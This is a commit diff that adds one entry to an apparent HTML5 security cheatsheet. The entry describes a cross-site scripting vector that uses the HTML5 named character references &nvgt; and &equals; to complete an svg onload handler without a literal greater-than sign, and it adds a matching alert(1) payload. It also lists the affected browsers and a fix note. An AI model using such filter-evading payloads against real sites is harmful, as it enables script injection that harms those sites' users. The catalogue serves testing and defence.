Added #144

0xr0ot · Aug 13, 2015 · b605771 · b605771
1 parent dd6d4fd
commit b605771
Show file tree

Hide file tree

Showing 2 changed files with 41 additions and 1 deletion.
diff --git a/items.js b/items.js
@@ -5112,6 +5112,45 @@ return [
         },
         'tags'      : ['referrer', 'opener', 'html5', 'location', 'tabnabbing'],
         'reporter'  : '.mario'
-    } 
+    },
+ { /* ID 144 - Generating greater-than with HTML5 Named Character References */
+        'id'        : 144,
+        'category'  : 'html5',
+        'name'      : {
+            'en'    : 'Generating greater-than with HTML5 Named Character References',
+            'ja'    : '',
+            'ru'    : '',
+            'cs'    : '',
+            'de'    : '',
+            'zh'    : ''
+        },
+        'data'      : '<iframe srcdoc="<svg onload=%js_alert%&nvgt;"></iframe>\r\n\r\n<a href="javascript:&apos;<svg onload&equals;%js_alert_html5ent%&nvgt;&apos;">CLICK</a>',
+        'description' : {
+            'en'    : 'Some of the HTML5 Named Character references generate two ASCII characters, such as &nvlt; and &nvgt;. This can in some exotic scenarios be abused to generate valid HTML without actually closing a tag with an ASCII greater-than. The entity will produce the greater-than so we do not have to.',
+            'ja'    : '',
+            'ru'    : '', 
+            'cs'    : '',
+            'de'    : '',
+            'zh'    : ''
+        },
+        'urls'		: ['https://developers.whatwg.org/named-character-references.html#named-character-references']
+        'howtofix'  : {
+            'en'    : 'Be very careful when HTML attributes are used to carry HTML data that is later being used on the website. When entities are accepted, some HTML entities can produce dangerous characters even if they don\'t look like it on first sight.',
+            'ja'    : '',
+            'ru'    : '',
+            'cs'    : '',
+            'de'    : '',
+            'zh'    : ''
+        },
+        'browsers'  : {
+            'chrome' : ['4.0', 'latest'], 
+            'opera' : ['12.0', 'latest'],
+            'internet explorer' : ['9.0', 'latest'],
+            'firefox' : ['4.x', 'latest'],
+            'safari' : ['4.0', 'latest']
+        },
+        'tags'      : ['entity', 'character reference', 'html5', 'iframe'],
+        'reporter'  : '.mario'
+    }    
 ]
 }));
diff --git a/payloads.js b/payloads.js
@@ -22,6 +22,7 @@ return {
     'js_alert_3'        : 'alert(3)',
     'js_alert_only'     : 'alert',
     'js_alert_entities' : '&#x61;l&#x65;rt&#40;1)',
+    'js_alert_html5ent' : 'alert&lpar;1&rpar;',
     'js_alert_template' : 'alert`1`',
     'js_esc_template'   : 'alert\\`1\\`',
     'js_write'          : 'write(1)',